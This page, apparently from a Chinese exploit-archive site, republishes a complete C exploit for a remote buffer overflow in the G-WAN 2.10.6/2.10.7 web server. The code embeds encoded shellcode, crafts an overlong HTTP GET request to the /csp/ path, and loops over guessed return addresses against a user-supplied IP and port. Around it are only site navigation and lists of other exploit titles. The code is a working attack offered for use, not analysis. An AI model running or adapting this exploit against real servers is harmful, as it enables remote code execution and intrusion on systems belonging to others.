首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
G-WAN 2.10.6 / 2.10.7 Remote Buffer Overflow
来源:vfocus.net 作者:vfocus 发布时间:2011-10-19  

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Shellcode written by gunslinger, http://www.shell-storm.org/shellcode/files/shellcode-679.php */

char code[] =
  "%eb%11%5e%31%c9%b1%43%80%6c%0e%ff%35%80%e9%01"
  "%75%f6%eb%05%e8%ea%ff%ff%ff%95%66%f5%66%07%e5"
  "%40%87%9d%a3%64%a8%9d%9d%64%64%97%9e%be%18%87"
  "%9d%62%98%98%98%be%16%87%20%3c%86%88%be%16%02"
  "%b5%96%1d%29%34%34%34%a3%98%55%62%a1%a5%55%68"
  "%66%68%68%6c%55%62%9a%55%64%97%9e%a3%64%64%a8"
  "%9d%3b";

void usage()
{
  extern char *__progname;

  (void) fprintf(stderr, "usage: %s ip port\n", __progname);

  exit(EXIT_FAILURE);
}

char *build(char *code, char *eip)
{
  char nops[1024], *egg;
  int len = 1094;
 
  memset(nops, '@', sizeof nops);
  egg = (char *) malloc(4096);
  (void) snprintf(egg, 4096, "GET /csp/%.*s%s%.*s%%%02x%%%02x%%%02x%%%02x HTTP/1.0\r\n\r\n",
    512, nops,
    code,
    len - (9 + 512 + (int) strlen(code) / 3 + 4 + 13), nops,
    eip[0] & 0xff, eip[1] & 0xff, eip[2] & 0xff, eip[3] & 0xff);
  return egg;
}

int overflow(char *ip, char *port, char *egg)
{
  char reply[1024];
  struct sockaddr_in sin;
  int n, e, s;

  bzero(&sin, sizeof sin);
  sin.sin_family = AF_INET;
  e = inet_pton(AF_INET, ip, &sin.sin_addr.s_addr);
  if (e == -1)
    return -1;
  sin.sin_port = htons(strtol(port, NULL, 0));
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (s == -1)
    return -1;
     
  e = connect(s, (struct sockaddr *) &sin, sizeof sin);
  if (e == -1)
    return -1;
 
  n = write(s, egg, strlen(egg));
  if (n != strlen(egg))
    return -1;

  (void) read(s, reply, sizeof reply);
  (void) close(s);
  return 0;
}

int try(char *code, char *ip, char *port, char *addr)
{
  char *egg;
  int e;
 
  (void) fprintf(stderr, "(trying %p)\n", addr);

  egg = build(code, (char *) &addr);
  e = overflow(ip, port, egg);
  if (e == -1)
    return -1;
  free(egg);
  return 0;
}

int main(int argc, char **argv)
{
  char *ip, *port;
  u_int64_t addr;
  int e;

  if (argc != 3)
    usage();
  ip = argv[1];
  port = argv[2];
 
  for (addr = 0xf7da4dc0;; addr -= 4096)
    {
      e = try(code, ip, port, (char *) addr);
      if (e == -1)
 errx(1, "try");
      sleep(1);
     
      addr ^= 0x40000;
      e = try(code, ip, port, (char *) addr);
      if (e == -1)
 errx(1, "try");
      sleep(1);

      addr ^= 0x40000;
    }

  exit(EXIT_SUCCESS);
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux MIPS execve 52 bytes
·Opera <= 11.52 PoC Denial of S
·MIPS Linux XOR Shellcode Encod
·Oracle DataDirect Multiple Nat
·WM Downloader 3.0.0.9 (.pls) F
·Opera <= 11.52 Stack Overflow
·Apple Safari Webkit libxslt Ar
·UnrealIRCd 3.2.8.1 Local Confi
·Dolphin <= 7.0.7 (member_menu_
·Opera <= 11.51 Use After Free
·Dos BP Random Member Widget Pl
·Cyclope Internet Filtering Pro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved